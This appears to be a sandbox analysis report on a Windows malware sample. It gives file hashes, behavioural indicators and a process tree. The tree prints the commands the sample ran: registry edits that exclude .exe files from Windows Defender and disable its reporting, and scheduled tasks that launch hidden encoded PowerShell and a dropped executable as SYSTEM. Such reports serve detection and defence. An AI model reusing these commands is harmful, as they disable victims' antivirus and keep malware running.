Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2024, 10:41
Static task
static1
Behavioral task
behavioral1
Sample
4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe
Resource
win10v2004-20240226-en
General
-
Target
4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe
-
Size
6.8MB
-
MD5
82883bd1dc515992302bdc7a797f7ae6
-
SHA1
f6bd4475cdec5fd52ebb746f04d8c0ffbde1a3c0
-
SHA256
4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded
-
SHA512
d89f60764511972be34bc6acdc19bf44f7d354b82977b256353238f2ab2da8ad8602c944810d6560121409d16cd230d7f544ab9589bfe0f4bd4c22db5cd111d2
-
SSDEEP
98304:91ONpDcPHB7oWB0q32sghrEGog5UFI0eDyNGfJ9cnqzdmHQuuWy4rk0yaYWngUxG:91ONSKWBz3lgi+0fYLfsvry4A0y2g7h
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 79 2096 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation vrgkBCY.exe -
Executes dropped EXE 3 IoCs
pid Process 2176 Install.exe 2496 EgorIPt.exe 1480 vrgkBCY.exe -
Loads dropped DLL 1 IoCs
pid Process 2096 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json vrgkBCY.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json vrgkBCY.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini vrgkBCY.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vrgkBCY.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 vrgkBCY.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 vrgkBCY.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini EgorIPt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 vrgkBCY.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 vrgkBCY.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol EgorIPt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vrgkBCY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vrgkBCY.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi vrgkBCY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vrgkBCY.exe File created C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml vrgkBCY.exe File created C:\Program Files (x86)\yvWovCiVU\XssxXq.dll vrgkBCY.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\xEVrliM.dll vrgkBCY.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\DzMHvAX.dll vrgkBCY.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml vrgkBCY.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml vrgkBCY.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\yvOaXHv.dll vrgkBCY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi vrgkBCY.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vrgkBCY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja vrgkBCY.exe File created C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml vrgkBCY.exe File created C:\Program Files (x86)\LCifMpYymZWU2\lXgsaswxXXnqT.dll vrgkBCY.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job schtasks.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3336 schtasks.exe 1476 schtasks.exe 968 schtasks.exe 3024 schtasks.exe 4004 schtasks.exe 4756 schtasks.exe 1396 schtasks.exe 2464 schtasks.exe 964 schtasks.exe 1848 schtasks.exe 4456 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{64fb06ed-0000-0000-0000-d01200000000}\MaxCapacity = "14116" vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{64fb06ed-0000-0000-0000-d01200000000} vrgkBCY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" vrgkBCY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3528 powershell.EXE 3528 powershell.EXE 3528 powershell.EXE 3944 powershell.exe 3944 powershell.exe 3944 powershell.exe 4148 powershell.exe 4148 powershell.exe 4148 powershell.exe 4116 powershell.EXE 4116 powershell.EXE 4116 powershell.EXE 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe 1480 vrgkBCY.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3528 powershell.EXE Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4116 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2176 2240 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe 94 PID 2240 wrote to memory of 2176 2240 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe 94 PID 2240 wrote to memory of 2176 2240 4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe 94 PID 2176 wrote to memory of 2272 2176 Install.exe 97 PID 2176 wrote to memory of 2272 2176 Install.exe 97 PID 2176 wrote to memory of 2272 2176 Install.exe 97 PID 2176 wrote to memory of 2944 2176 Install.exe 99 PID 2176 wrote to memory of 2944 2176 Install.exe 99 PID 2176 wrote to memory of 2944 2176 Install.exe 99 PID 2944 wrote to memory of 1200 2944 forfiles.exe 102 PID 2944 wrote to memory of 1200 2944 forfiles.exe 102 PID 2272 wrote to memory of 5020 2272 forfiles.exe 101 PID 2944 wrote to memory of 1200 2944 forfiles.exe 102 PID 2272 wrote to memory of 5020 2272 forfiles.exe 101 PID 2272 wrote to memory of 5020 2272 forfiles.exe 101 PID 1200 wrote to memory of 2872 1200 cmd.exe 103 PID 1200 wrote to memory of 2872 1200 cmd.exe 103 PID 1200 wrote to memory of 2872 1200 cmd.exe 103 PID 5020 wrote to memory of 1012 5020 cmd.exe 104 PID 5020 wrote to memory of 1012 5020 cmd.exe 104 PID 5020 wrote to memory of 1012 5020 cmd.exe 104 PID 1200 wrote to memory of 224 1200 cmd.exe 105 PID 1200 wrote to memory of 224 1200 cmd.exe 105 PID 1200 wrote to memory of 224 1200 cmd.exe 105 PID 5020 wrote to memory of 3344 5020 cmd.exe 106 PID 5020 wrote to memory of 3344 5020 cmd.exe 106 PID 5020 wrote to memory of 3344 5020 cmd.exe 106 PID 2176 wrote to memory of 3336 2176 Install.exe 110 PID 2176 wrote to memory of 3336 2176 Install.exe 110 PID 2176 wrote to memory of 3336 2176 Install.exe 110 PID 2176 wrote to memory of 1476 2176 Install.exe 112 PID 2176 wrote to memory of 1476 2176 Install.exe 112 PID 2176 wrote to memory of 1476 2176 Install.exe 112 PID 3528 wrote to memory of 2336 3528 powershell.EXE 117 PID 3528 wrote to memory of 2336 3528 powershell.EXE 117 PID 2176 wrote to memory of 1876 2176 Install.exe 124 PID 2176 wrote to memory of 1876 2176 Install.exe 124 PID 2176 wrote to memory of 1876 2176 Install.exe 124 PID 2176 wrote to memory of 1476 2176 Install.exe 126 PID 2176 wrote to memory of 1476 2176 Install.exe 126 PID 2176 wrote to memory of 1476 2176 Install.exe 126 PID 2496 wrote to memory of 3944 2496 EgorIPt.exe 131 PID 2496 wrote to memory of 3944 2496 EgorIPt.exe 131 PID 2496 wrote to memory of 3944 2496 EgorIPt.exe 131 PID 3944 wrote to memory of 3680 3944 powershell.exe 133 PID 3944 wrote to memory of 3680 3944 powershell.exe 133 PID 3944 wrote to memory of 3680 3944 powershell.exe 133 PID 3680 wrote to memory of 3180 3680 cmd.exe 134 PID 3680 wrote to memory of 3180 3680 cmd.exe 134 PID 3680 wrote to memory of 3180 3680 cmd.exe 134 PID 3944 wrote to memory of 2340 3944 powershell.exe 135 PID 3944 wrote to memory of 2340 3944 powershell.exe 135 PID 3944 wrote to memory of 2340 3944 powershell.exe 135 PID 3944 wrote to memory of 3336 3944 powershell.exe 136 PID 3944 wrote to memory of 3336 3944 powershell.exe 136 PID 3944 wrote to memory of 3336 3944 powershell.exe 136 PID 3944 wrote to memory of 3088 3944 powershell.exe 137 PID 3944 wrote to memory of 3088 3944 powershell.exe 137 PID 3944 wrote to memory of 3088 3944 powershell.exe 137 PID 3944 wrote to memory of 4940 3944 powershell.exe 138 PID 3944 wrote to memory of 4940 3944 powershell.exe 138 PID 3944 wrote to memory of 4940 3944 powershell.exe 138 PID 3944 wrote to memory of 1004 3944 powershell.exe 139 PID 3944 wrote to memory of 1004 3944 powershell.exe 139
Processes
-
C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\7zS7688.tmp\Install.exe.\Install.exe /zkizdidrXl "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵PID:1012
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵PID:3344
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵PID:2872
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵PID:224
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzPXhdsBX" /SC once /ST 07:09:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:3336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzPXhdsBX"3⤵PID:1476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzPXhdsBX"3⤵PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe\" hl /YHsite_idMhh 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1476
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2336
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:920
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3944
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4492 --field-trial-handle=2272,i,17338911640954948469,1637568328132129119,262144 --variations-seed-version /prefetch:81⤵PID:1636
-
